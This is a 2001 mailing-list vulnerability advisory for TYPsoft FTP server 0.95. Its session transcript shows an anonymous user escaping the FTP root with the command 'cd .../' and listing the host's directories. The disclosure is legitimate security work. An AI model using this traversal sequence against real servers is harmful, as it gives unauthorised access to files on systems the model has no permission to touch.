Date: Mon, 7 May 2001 15:13:38 +0200
From: SosPiro <[email protected]>
To: [email protected]Subject: Vulnerabilty in TYPsoft FTP server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerabilty in TYPsoft FTP server v0.95
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
TYPsoft FTP Server is a freeware ftp server available from
http://typsoft.n3.net .
Affected systems:
FTP server v0.95 - 0.93 and probably prior versions for
Windows 95/98/NT/2000/ME
Description:
An attacker with anonymous access to the ftp server can break out of the ftp
root using the dot vulnerability.
This is the problem:
>ftp 127.0.0.1
220 TYPsoft FTP server 0.95 ready...
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp>pwd
257 " / " is current directory.
ftp>cd ../
501 CWD failed. Cannot accept relative path using dot notation.
ftp> cd .../
250 CWD command successful. "/.../" is current directory.
ftp>dir
drw-rw-rw- 1 ftp ftp 0 May 01 19:44
FTP Server
drw-rw-rw- 1 ftp ftp 0 May 01 19:47
temp
drw-rw-rw- 1 ftp ftp 0 Dec 24 2000
windows
.....
226 Transfer complete.
ftp>
Vendor status:
TYPsoft staff was contacted on Tuesday 1 May,2001 and no reply was received.
SosPiro
[email protected]
